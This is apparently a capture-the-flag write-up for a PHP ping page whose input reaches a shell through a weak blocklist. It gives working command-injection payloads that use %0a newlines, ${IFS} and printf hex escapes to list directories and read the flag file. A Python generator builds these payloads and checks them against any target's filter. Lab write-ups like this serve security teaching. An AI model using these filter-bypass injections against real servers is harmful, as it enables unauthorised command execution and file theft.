1 Open the challenge and view the source shown below
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    // Blocklist: the separators | & ; the space, the slash and three keywords.
    // Newline, $, ( ), { }, <, backslash and quotes are NOT matched.
    if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";   // $ip is interpolated unquoted into the command line
        exec($cmd, $res);           // runs through /bin/sh -c; each stdout line lands in $res
    } else {
        $res = $m;                  // on a filter hit, the matched tokens are returned instead
    }
}
?>
2 Code analysis
1) The regex filters the command separators &, | and ;, so the usual connectors are unavailable. A newline is not matched, and sh treats a newline exactly like ; (end of one command, start of the next), so %0a in the URL works. %0d is sometimes listed next to it, but sh does not treat a carriage return as a separator, so only %0a is relied on here.
2) The space is filtered as well; use ${IFS} or $IFS$9 instead. IFS is the shell's internal field separator and defaults to space, tab and newline, so expanding it yields whitespace. The braces, or the empty positional parameter $9, are needed to end the variable name: $IFSls would be read as a variable called IFSls.
3) The path separator / is filtered too (as are the words cat, flag and ctfhub). Hex-encode the path and let printf rebuild it at runtime inside a $(...) command substitution, which the regex does not match.
URL-encoding and decoding the payload with Python:
from urllib import parse
parse.quote()    # URL-encode
parse.unquote()  # URL-decode
3 List the current directory
payload: ?ip=127.0.0.1%0als#
result: Array ( [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes [1] => flag_is_here [2] => index.php )
The ping runs first, then ls on its own line. The trailing # is harmless either way: typed in the browser it is the URL fragment and is never sent, and if it does reach the shell it comments out nothing, because $ip is the last thing in the command string.
4 List the flag_is_here directory
The directory name contains the filtered word flag, so it cannot be sent literally. Use printf to turn hex escapes back into the string at runtime, wrapped in a $(...) command substitution. Checking the conversion in a shell first, with the full path of the flag file:
# printf${IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x31\x37\x38\x36\x30\x32\x34\x34\x39\x33\x35\x36\x30\x31\x2e\x70\x68\x70"
flag_is_here/flag_17860244935601.php
Caveat: \xHH escapes are understood by bash's builtin printf and by GNU coreutils printf, but POSIX only guarantees octal \ddd, and dash's builtin printf (the /bin/sh of Debian and Ubuntu) does not interpret \x. If the hex form comes back empty, use octal instead, e.g. \146\154\141\147 for flag.
flag_is_here as hex: \x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65
payload: ?ip=127.0.0.1%0als${IFS}$(printf${IFS}%22\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65%22)#
result: Array ( [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes [1] => flag_17860244935601.php )
5 Get the flag
1) The listing shows the flag is a .php file. cat is filtered, and the file starts with <?php, which a browser would treat as markup rather than text, so read it through stdin redirection (base64<file: no cat and no space) and base64-encode the output so it comes back as one plain text line.
flag_is_here/flag_17860244935601.php as hex: \x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x31\x37\x38\x36\x30\x32\x34\x34\x39\x33\x35\x36\x30\x31\x2e\x70\x68\x70
payload: ?ip=127.0.0.1%0abase64<$(printf${IFS}%22\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x31\x37\x38\x36\x30\x32\x34\x34\x39\x33\x35\x36\x30\x31\x2e\x70\x68\x70%22)#
result: Array ( [0] => PING 127.0.0.1 (127.0.0.1): 56 data bytes [1] => PD9waHAgLy8gY3RmaHVie2YxZTVhZGYwZjliOGVkNTc0ODJlOThkY30K )
2) base64-decode the returned line:
b'<?php // ctfhub{f1e5adf0f9b8ed57482e98dc}\n'
The flag is ctfhub{f1e5adf0f9b8ed57482e98dc}.
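The three steps above, as an added example that is not the writeup's own script: it rebuilds the PHP blocklist in Python with the same regex, generates the hex (and, for a dash /bin/sh, octal) printf escapes, and assembles each payload only after checking it would reach exec(). It sends nothing; 127.0.0.1 is the placeholder target and the base64 response line is the one quoted in step 5.

```python
"""
Added example (not the writeup's code): reproduce the challenge's filter and
build the injection payloads offline, checking each against the filter first.
"""
import base64
import re
from urllib import parse

# Same alternation as the preg_match_all() in index.php.
FILTER = re.compile(r"\||&|;| |/|cat|flag|ctfhub")


def passes_filter(ip: str) -> bool:
    """True when the PHP code would reach exec(): no filtered token matches."""
    return FILTER.search(ip) is None


def hex_escape(s: str) -> str:
    """printf \\xHH escapes, the form the writeup uses (bash builtin / GNU printf)."""
    return "".join(f"\\x{ord(c):02x}" for c in s)


def octal_escape(s: str) -> str:
    """printf \\ddd escapes: the POSIX-guaranteed form, which also works when
    /bin/sh is dash, whose builtin printf ignores \\x."""
    return "".join(f"\\{ord(c):03o}" for c in s)


def shell_string(s: str, octal: bool = False) -> str:
    """A $(...) command substitution that makes the shell reproduce `s` at
    runtime, so '/', 'flag' and the space never appear in the request."""
    esc = octal_escape(s) if octal else hex_escape(s)
    return f'$(printf${{IFS}}"{esc}")'


def build_payload(command: str) -> str:
    """URL-encoded `ip` parameter: a harmless address, a newline (%0A) that
    ends the ping command, then the injected command. Raises if the value
    would be caught by the filter."""
    raw = "127.0.0.1\n" + command
    if not passes_filter(raw):
        raise ValueError(f"blocked by filter: {raw!r}")
    # safe="" encodes $ { } ( ) " and \ too; the server decodes them back.
    return parse.quote(raw, safe="")


def extract_flag(response_line: str) -> str:
    """Decode the line returned by `base64<file` and pull out the flag."""
    text = base64.b64decode(response_line).decode()
    m = re.search(r"ctfhub\{[0-9a-f]+\}", text)
    return m.group(0) if m else ""


# The three requests of the writeup, in order.
STEP_LS = build_payload("ls")
STEP_LS_DIR = build_payload("ls${IFS}" + shell_string("flag_is_here"))
STEP_READ = build_payload("base64<" + shell_string("flag_is_here/flag_17860244935601.php"))
# Same read request in the octal form for a dash /bin/sh.
STEP_READ_OCTAL = build_payload(
    "base64<" + shell_string("flag_is_here/flag_17860244935601.php", octal=True))

if __name__ == "__main__":
    for p in (STEP_LS, STEP_LS_DIR, STEP_READ, STEP_READ_OCTAL):
        print("?ip=" + p)
    # Response line quoted in the writeup for the third request.
    print(extract_flag("PD9waHAgLy8gY3RmaHVie2YxZTVhZGYwZjliOGVkNTc0ODJlOThkY30K"))
```

build_payload() refusing a blocked value is the useful part when adapting this to a different blocklist: change FILTER to the target's regex and every payload is re-validated before it is sent.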
6 The Python script used
#!C:\Python3.7
# -*- coding:utf-8 -*-
import base64
from urllib import parse


def char2hex(s):
    """Turn a string into printf-style \xHH escapes, e.g. "fl" -> "\x66\x6c"."""
    h = ""
    for i in s:
        tem = hex(ord(i))      # "0x66", "0x6c", ...
        h += tem
    print(h)                   # concatenated "0x660x6c..." form
    h = str(h).replace("0x", "\\x")
    print(h)                   # "\x66\x6c..." form, ready to paste into printf
    return h


if __name__ == '__main__':
    # Decode the base64 line returned by base64<file (step 5).
    print(base64.b64decode("PD9waHAgLy8gY3RmaHVie2YxZTVhZGYwZjliOGVkNTc0ODJlOThkY30K"))
    # Hex form of the flag path for the printf payload (step 4/5).
    char2hex("flag_is_here/flag_17860244935601.php")
    # parse.quote()   URL-encode
    # parse.unquote() URL-decode
    # for i in range(128):
    #     print(i, parse.quote(chr(i)))